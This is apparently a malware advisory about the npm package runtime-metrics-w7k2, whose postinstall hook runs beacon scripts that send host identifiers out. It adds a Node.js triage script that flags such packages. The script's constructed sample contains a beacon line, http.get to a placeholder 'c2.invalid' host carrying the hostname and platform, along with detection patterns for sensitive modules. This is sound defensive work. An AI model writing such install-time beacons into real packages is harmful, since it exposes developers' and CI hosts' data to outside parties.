MAL-2026-5992
Malicious code in runtime-metrics-w7k2 (npm)
Details
## Source: amazon-inspector (9c2062a3f2564ced7261d9b8be8a49e11117bd74ffe3e92aad6029c471921e2d)

Package declares a postinstall hook (`"postinstall": "node run.js"`) that fires automatically on `npm install`. The tarball ships beacon scripts (`beacon18.js`, `beacon_linux.js`) that import `child_process`, `os`, and `http`, read host identifiers via `os.hostname()` / `os.platform()`, and issue outbound HTTP `GET`/`POST` requests carrying that data. The combination of automatic install-time execution, host enumeration, `child_process` reachability, and unsolicited outbound HTTP from an unknown low-reputation package named with a random suffix matches a host-beacon / exfiltration shape with no legitimate library purpose. Installing this package on a developer or CI machine causes immediate disclosure of host metadata to an external endpoint and provides the publisher a foothold for follow-on commands.
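The indicators listed above (an install-time lifecycle hook, imports of `child_process`/`os`/`http`, host-identifier reads, and outbound requests in the same file) can be checked statically before a package is ever installed. The following Node.js script is an added example, not code from the advisory or from the flagged package: it triages a `package.json` plus the source files it ships and returns a verdict. The sample package manifest and the two file bodies are constructed here to mirror the shape the advisory describes; `c2.invalid` is a placeholder hostname, and no network access is made.

```javascript
// Added example (not from the advisory): static triage of an npm package for the
// install-time beacon shape described above. It inspects package.json lifecycle
// scripts and shipped JS files for imports of child_process / os / http(s),
// host-identifier reads, and outbound requests. Inputs below are constructed.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Modules whose presence in an install-time script deserves a second look.
const SENSITIVE_MODULES = ["child_process", "os", "http", "https", "net", "dns"];

// Return the lifecycle scripts that npm runs automatically during install.
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === "string")
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Extract module names from require('x') and `import ... from 'x'` forms.
function importedModules(source) {
  const found = new Set();
  const re = /(?:require\s*\(\s*|from\s+)['"]([^'"]+)['"]/g;
  let m;
  while ((m = re.exec(source)) !== null) found.add(m[1].replace(/^node:/, ""));
  return [...found];
}

// Static indicators of host enumeration and outbound HTTP in one source file.
function scanSource(source) {
  const modules = importedModules(source);
  return {
    sensitiveModules: modules.filter((x) => SENSITIVE_MODULES.includes(x)),
    readsHostIdentity: /\bos\.(hostname|platform|userInfo|networkInterfaces)\s*\(/.test(source),
    makesOutboundRequest: /\b(https?)\.(get|request)\s*\(|\bfetch\s*\(/.test(source),
    canSpawnProcesses: modules.includes("child_process"),
  };
}

// Combine hook presence with per-file indicators into a triage verdict:
// "block" when an install hook coexists with a beacon-like file, "review" when
// only some indicators are present, "allow" otherwise.
function assessPackage(pkg, files) {
  const hooks = findInstallHooks(pkg);
  const findings = Object.entries(files).map(([name, src]) => ({ file: name, ...scanSource(src) }));
  const beaconLike = findings.some((f) => f.readsHostIdentity && f.makesOutboundRequest);
  const reasons = [];
  if (hooks.length) reasons.push(`install-time hook(s): ${hooks.map((h) => h.hook).join(", ")}`);
  if (beaconLike) reasons.push("host identity read + outbound HTTP in the same file");
  if (findings.some((f) => f.canSpawnProcesses)) reasons.push("child_process reachable");
  const verdict = hooks.length && beaconLike ? "block" : reasons.length ? "review" : "allow";
  return { verdict, reasons, hooks, findings };
}

// Constructed sample inputs (hypothetical; modelled on the advisory's description).
const SAMPLE_PACKAGE_JSON = {
  name: "example-metrics-pkg",
  version: "1.0.0",
  scripts: { postinstall: "node run.js" },
};
const SAMPLE_FILES = {
  "run.js": "require('./beacon.js');\n",
  "beacon.js": [
    "const os = require('os');",
    "const http = require('http');",
    "const cp = require('child_process'); // imported but unused in this sample",
    "const q = encodeURIComponent(os.hostname() + ':' + os.platform());",
    "http.get('http://c2.invalid/?h=' + q); // placeholder host, never resolves",
  ].join("\n"),
};

// Run the triage over the constructed sample and return the report.
function demo() {
  return assessPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES);
}

console.log(JSON.stringify(demo(), null, 2));
```

In practice the same functions can be pointed at an extracted tarball (`npm pack` followed by untarring) so the check runs in CI before `npm install`; pairing it with `npm install --ignore-scripts` stops the hook from firing while the package is reviewed.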
Affected packages
No fixed version published yet for runtime-metrics-w7k2 (npm). Pin to a known-safe version or switch to an alternative.